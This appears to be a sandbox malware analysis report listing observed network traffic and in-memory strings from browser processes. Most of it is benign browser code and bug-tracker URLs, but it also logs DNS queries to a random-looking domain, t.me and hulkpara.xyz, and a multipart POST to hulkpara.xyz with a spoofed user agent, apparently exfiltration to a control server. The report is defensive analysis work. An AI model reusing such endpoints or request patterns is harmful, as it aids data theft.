Source: global traffic	HTTP traffic detected: GET /b2?rn=1734552576462&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=37276334F0DB6278260F766DF1DC6332&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=10C45b5c73650930056d0a01734552578; XID=10C45b5c73650930056d0a01734552578
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1734552576462&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=39588361c2f94ab1858ca082b3082955&activityId=39588361c2f94ab1858ca082b3082955&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=16EDE2E0EE6B429ABE54DF9CBFB76838&MUID=37276334F0DB6278260F766DF1DC6332 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=37276334F0DB6278260F766DF1DC6332; _EDGE_S=F=1&SID=3C08BC0563A9660F3C33A95C626F67F8; _EDGE_V=1; SM=T

Source: 25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	String found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000F.00000003.1928298831.000016CC00F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1928427422.000016CC00314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1928365026.000016CC00EC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 0000000F.00000003.1928298831.000016CC00F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1928427422.000016CC00314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1928365026.000016CC00EC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 0000000F.00000003.1943483741.000016CC0157C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 0000000F.00000003.1943483741.000016CC0157C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytcaogl equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: oNDvJHpUYYRpVDcYWEDspYa.oNDvJHpUYYRpVDcYWEDspYa
Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: hulkpara.xyz
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----WT0R1DJWBSJM7YUKX47GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: hulkpara.xyzContent-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153191869.0000104000394000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3452
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3584
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3586
Source: msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3623
Source: msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3624
Source: msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3625
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3832
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3862
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3965
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3970
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4324
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4384
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4405
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4428
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4551
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4633
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4722
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4836
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4901
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4937
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5007
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5055
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153191869.0000104000394000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5061
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5281
Source: chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/5371
